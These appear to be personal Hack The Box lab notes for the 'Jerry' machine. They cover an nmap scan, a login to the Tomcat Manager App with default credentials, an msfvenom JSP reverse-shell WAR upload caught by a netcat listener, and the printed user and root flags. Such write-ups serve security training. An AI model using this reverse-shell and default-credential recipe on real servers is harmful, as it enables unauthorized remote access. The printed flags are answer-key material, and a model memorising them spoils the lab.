[HTB Notes] Jerry

1. Check open ports
nmap --min-rate 1000 -p- -v 10.10.10.95
# 8080/tcp open  http-proxy
nmap -oN jerry -p8080 -sC -sV -v 10.10.10.95
# 8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
# |_http-favicon: Apache Tomcat
# | http-methods:
# |_  Supported Methods: GET HEAD POST OPTIONS
# |_http-server-header: Apache-Coyote/1.1
# |_http-title: Apache Tomcat/7.0.88

2. Enumerate Apache Tomcat service (port 8080)
[x] Click on Manager App
[x] 401 Unauthorized error without login credentials
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
[x] Try to login to Manager App again
[x] USERNAME: tomcat
[x] PASSWORD: s3cret

3. Exploit war file upload in Apache Tomcat
[x] Create jsp payload (shell.war) using msfvenom
msfvenom -p java/jsp_shell_reverse_tcp LHOST=HTB_IPv4 LPORT=4444 -f war > shell.war
# Payload size: 1098 bytes
# Final size of war file: 1098 bytes
[x] Set-up local listener
nc -lvp 4444
# Listening on [unknown] (family 0, port 462652714)
[x] Upload shell.war and navigate to http://10.10.10.95:8080/shell
[x] Going back to the netcat listener
# C:\apache-tomcat-7.0.88>
#
cd ..
# C:\>
dir
# 06/18/2018  10:31 PM    <DIR>          Users
dir Users
# 06/18/2018  10:31 PM    <DIR>          Administrator
dir Users\Administrator
# 06/19/2018  06:09 AM    <DIR>          Desktop
dir Users\Administrator\Desktop
# 06/19/2018  06:09 AM    <DIR>          flags
dir Users\Administrator\Desktop\flags
# 06/19/2018  06:11 AM                88 2 for the price of 1.txt
type Users\Administrator\Desktop\flags\"2 for the price of 1.txt"
# user.txt
# 7004dbcef0f854e0fb401875f26ebd00
#
# root.txt
# 04a8b36e1545a455393d067e772fe90e